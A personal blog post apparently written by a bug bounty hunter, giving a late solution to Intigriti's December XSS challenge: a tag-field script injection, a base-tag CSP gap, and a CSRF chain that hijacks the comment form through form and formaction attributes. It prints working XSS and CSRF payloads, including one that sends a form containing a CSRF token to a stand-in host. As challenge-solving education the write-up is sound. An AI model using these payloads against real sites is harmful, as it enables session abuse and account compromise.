A late writeup

I started to write down my solution to Intigriti’s December XSS challenge but failed to meet the deadline. Despite the missed deadline, I felt like I should still post this, mainly to force myself to start up my blog in 2023.

My solution does not differ that much from the great writeup by farisv, but this is how I found it.

The challenge

The challenge can be found on

https://challenge-1222.intigriti.io/

The rules are listed as follows:

  • Should work on the latest version of Chrome and Firefox.
  • Should execute alert showing the victim’s/another user’s username.
  • Should leverage a cross-site scripting vulnerability on this domain.
  • Shouldn’t be self-XSS or related to MiTM attacks.
  • Should NOT use another challenge on the intigriti.io domain.

The actual challenge page can be found under the path /challenge. This page drops us into a simple multiuser blog application. We can visit some default blog pages on /blog/[UUID] or sign in and edit our own blog page (assigning us a new UUID).

A user can also post comments on other users’ blog pages.

Testing the application

When approaching applications like this my first action is to fill out all forms and click all links. I tried to write a comment on one of the default blog pages (/blog/00000000-00000000-00000000-00000000) but this did not lead to any injections. The other option is creating your own blog page by visiting /edit. This page states

Edit your blog here and share it later with your friends. You can use HTML if you want, but don’t do shady things!

Examining sanitizers

I have not been doing web security for very long, but one observation I have made is that no application seems to get this part right! Letting a user render HTML on your domain is not an easy task (from my experience, only iframes with the sandbox flag come close to protecting users from other users’ input). I have also learned that this does not mean a “simple XSS” is always possible, but rather that injections are a much broader category with a lot of corner cases. That’s why I usually start out with this payload

'"><h1>asd</h1>

Entering this into both the content and the tags field on this page reveals a first injection point in the rendered taglist.

First injection

Testing something more interesting like

'"><img/src/onerror=alert(1)><script>alert(2)</script>

showed how the tags rendered in the DOM

<div class="col-2 m-1 border rounded bg-info" id="'&quot;><img/src/onerror=alert(1)><script>alert(2)</script>">
    '"&gt;
    <img src="" onerror="alert(1)">
    <script>alert(2)</script>
</div>

But the console showed that the img tag got blocked by CSP, while the script tag did not execute at all (script elements inserted via innerHTML are never executed, per the HTML spec). Another console error hinted at the input also ending up in some application JavaScript

Uncaught SyntaxError: Unexpected token '<'


Looking at the source code, these lines show what is happening

tags.forEach(element => {
    element = element.trim();
    let div = document.createElement("div");
    div.classList.add("col-2", "m-1", "border", "rounded", "bg-info");
    div.id = element;
    let s = document.createElement("script");
    s.innerText = `document.querySelector("#${element}").addEventListener("click", () => remove_tag("${element}"))`;
    div.innerHTML = element;
    tags_output.appendChild(div);
    tags_output.appendChild(s);
});

Here we can see that each tag we supply in the tag field is concatenated into a new script element’s text content. This allows us to inject arbitrary JavaScript code as long as we make the whole line end up as valid JavaScript. A short example is this tag

x");alert(1)//

which will give us the full script content

document.querySelector("#x");alert(1)//").addEventListener("click", () => remove_tag("x");alert(1)//"))

This will immediately pop up the alert box. That is great, but this is just a self-XSS, as there is no way to share this page with other users: saving the blog and visiting https://challenge-1222.intigriti.io/blog/[UUID] will not trigger the payload. I decided to leave this for now and move over to the content field, as that can be shared with other users.
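The string building can be reproduced outside the browser. A minimal sketch (buildScript is my own name for the inlined template, not a function from the challenge source):

```javascript
// Minimal sketch (plain Node.js, no DOM needed) of how the challenge page
// builds the inline script body. "element" is the attacker-controlled tag.
function buildScript(element) {
  return `document.querySelector("#${element}").addEventListener("click", () => remove_tag("${element}"))`;
}

// The closing `")` in the payload terminates the querySelector call,
// alert(1) becomes a standalone statement, and // comments out the rest
// of the line, keeping the whole thing valid JavaScript.
const payload = 'x");alert(1)//';
console.log(buildScript(payload));
```

Running this prints exactly the script content shown above, which is why the injected alert fires as soon as the script element is appended.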

Moving away from self-XSS (and a first solution)

Entering some basic XSS payloads into the field, saving, and visiting the blog page proved that there is some sort of sanitization in place. At this point I usually copy-paste a gigantic blob of payloads into the input field to see if any of the usual XSS bypasses work. They did not in this case.

The next step when testing sanitizers is to look at other parts of HTML that can cause problems. I usually test for some basic tags such as

<form><input></form>
<div id=test name=test data-test=test class=tesst>test</div>
<iframe></iframe>

As I had already gotten a hint about CSP being in place (from the self-XSS injection), I also decided to check the CSP on https://csp-evaluator.withgoogle.com. This hinted at the base tag being a possible vector. I tested with <base href=//example.com>, and it worked. This turned out to be the unintended solution to this challenge. It is a nice trick that I have used on multiple occasions on real bug bounty targets (an example of using the base tag can be found in a report I wrote to the GitLab program on HackerOne). The common mistake developers make is assuming that default-src 'self' will apply if base-uri is omitted. This is not the case: base-uri does not inherit any fallback rules and must be set explicitly.
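To illustrate (these header values are my own, not the challenge’s actual policy): a policy like

```http
Content-Security-Policy: default-src 'self'; script-src 'self'
```

places no restriction on <base> injection at all, because base-uri has no fallback to default-src. What a rebased page then lets an attacker do depends on the rest of the policy, but the tag itself is always allowed unless you opt in explicitly:

```http
Content-Security-Policy: default-src 'self'; script-src 'self'; base-uri 'self'
```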

My test payload did prove that the sanitizer removed neither form nor input tags, nor the id, name, or class attributes. This opens the door to DOM clobbering or JavaScript hijacking. Furthermore, the source code of the blog page revealed this snippet

document.addEventListener("DOMContentLoaded", function(){
    const queryString = window.location.search;
    const urlParams = new URLSearchParams(queryString);
    const share = urlParams.get('share')
    if (share != null) {
        let share_button = document.querySelector("#share-button");
        share_button.click()
    }
  });

This gives us the possibility to have the page “auto-click” whatever element we want, simply by putting the id share-button on our injected HTML.

Using “on-site CSRF” to escalate self XSS

My first thought was to add a form like this

<form action="/edit">
    <input name="content" value="test">
    <input name="tags" value="a&quot;;alert(1)//">
    <input type="submit" id="share-button">
</form>

and have the form auto-submitted by sending the link https://challenge-1222.intigriti.io/blog/[UUID]?share=x to a victim.

This ended up not working, as any POST actions on the page are protected with CSRF tokens. I tried some CSRF token bypasses, but it looked like the site validated the token correctly.

Going back to the blog page I moved my focus to the comment form. This form contains a hidden input value

<input type="hidden" name="csrf_token" value="[TOKEN]">

that is added to the request when a user posts a comment. This is a normal CSRF-token flow that makes it impossible for malicious users to forge their own POST requests, even if they find a way to inject form tags or mount basic CSRF attacks. I had run into this exact situation before, and I remember asking for help on Twitter

Looking for help on twitter

and @michenriksen@chaos.social helped me out and showed me the formaction attribute, which can be used on button elements to change the action of any form. Combining it with the form attribute on the same button also allows targeting form elements that do not enclose the button itself.

I decided to try this payload to leak the CSRF token to be able to perform a real cross-site request forgery on the edit page.

<button form="comment-form" formaction="https://example.com">Test</button>

I ended up creating the whole CSRF PoC on my page at https://joaxcar.com/poc/inti/hack.html, just to realize that the token was not the only protection on the challenge page… It turns out the session cookie is also set with SameSite=Lax, meaning it will not be included in cross-site form submissions.
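For context, a session cookie set like this (attribute values hypothetical)

```http
Set-Cookie: session=abc123; SameSite=Lax; Secure; HttpOnly
```

is still attached to top-level GET navigations (which is why simply linking a victim to the blog page works), but browsers drop it from cross-site POST form submissions, which is exactly the request my hosted PoC was trying to make.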

Another detour, before I saw the full picture, was trying different ways to embed content in HTML while bypassing the sanitizer. I looked at this blog post by Gareth Heyes, https://portswigger.net/research/framing-without-iframes, for inspiration. The sanitizer did not strip object tags, allowing me to frame any page of the site on the blog page (again restricted by CSP). It still did not lead to a solution.

Putting things together

The final puzzle piece was found by Googling “how to link input field to another form”. This taught me that the button element is not the only element that can target arbitrary forms: input elements can also be given a form attribute, linking them to any form on the page so that they are included in that form’s submission. This allows us to inject this final CSRF payload

<button id=share-button formaction="/edit" form=comment-form type=submit>Test</button>
<input form=comment-form name=tags value='x");window.onload=()=>alert(document.getElementsByClassName("navbar-brand")[0].innerText.substr(17))//'>
<input form=comment-form name=content value="<object type='text/html' data='/edit'></object>">

If we now send the link https://challenge-1222.intigriti.io/blog/[UUID]?share=x to a victim, the page will automatically click the button and hijack the comment form using the two new input elements. The first input field injects this payload into the tags field

x");window.onload=()=>alert(document.getElementsByClassName("navbar-brand")[0].innerText.substr(17))//

This pops an alert containing the active user’s username once the page has finished loading.

The other input element contains this payload

<object type='text/html' data='/edit'></object>

This embeds a framed copy of the victim’s edit page inside the victim’s blog page, so the tags payload fires both when the victim visits the edit page directly and when they view the blog page.


Final thoughts

This was a great challenge! I really enjoyed solving it. Sometimes challenges like this can feel a bit “made up”, but this one felt like a real-world scenario to me. Some of my reports to GitLab using similar techniques can be found here

https://gitlab.com/gitlab-org/gitlab/-/issues/365427

https://hackerone.com/reports/1533976

https://hackerone.com/reports/1409788